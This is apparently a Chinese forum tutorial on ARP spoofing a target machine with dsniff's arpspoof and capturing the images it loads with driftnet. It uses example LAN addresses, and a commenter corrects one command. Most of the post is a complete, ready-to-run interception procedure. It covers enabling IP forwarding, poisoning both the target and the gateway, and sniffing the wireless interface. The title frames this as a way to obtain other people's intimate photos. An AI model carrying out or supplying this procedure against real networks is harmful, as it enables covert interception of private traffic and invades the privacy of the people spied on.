Dsniff嗅探网络图片法则-下一个艳门照的产生地!

4
5,181

一、思路:通过ARP欺骗获得其他电脑的数据,并对数据进行筛选截取图片

二、测试环境:

攻击机:192.168.1.188

网关:192.168.1.1

目标机:192.168.1.108

使用系统:UBUNTU6414.04

软件环境:dsniffdriftnet

三、方法:

首先安装所需软件,使用下列代码安装

代码:

sudo apt-get install dsniff

sudo apt-get install driftnet

如果出现找不到软件的错误提示,请使用sudo apt-get update更新源。

1、打开一个终端,切换到ROOT权限下,并开启路由转发功能,不开启路由转发而使用后续指令会造

成对方断网。

代码:

sudo su

echo  “1” > /proc/sys/net/ipv4/ip_forward

见下图1

2、进行ARP欺骗,目的:将目标机192.168.1.108发送到路由器192.168.1.1的数据先发送给攻击机

192.168.1.188

代码:

sudo su

arpspoof -i wlan0 -t 192.168.1.108 192.168.1.1

见图2,(说明:我这里使用的是无线网卡,所以用的是wlan0,默认是eth0

3、再打开一个终端,切换到ROOT权限,并输入以下指令,目的是将路由器192.168.1.1发往目标机

192.168.1.108的数据先发送攻击机192.168.1.188,然后再转发!

代码:

sudo su

arpspoof -i wlan0 192.168.1.1 192.168.1.108

见图3,请细看,23的指令是不一样的。

4、此时,对网卡进行监听,打开终端,输入以下代码:

代码:

sudo su

driftnet -i wlan0

见图4。也可以加-d参数将嗅探的图片保存在临时目录。

5、这时候目标机在网络中传送图片信息会显卡在driftnet窗口里。见附图测试结果。driftnet窗口可以最大化,我这里是为了方便,所以未最大化。

见图5

  1. 感谢分享~
    提醒一下:第3点 少了个 -t 应该是arpspoof -i wlan0 -t 192.168.1.1 192.168.1.108 小瑕疵。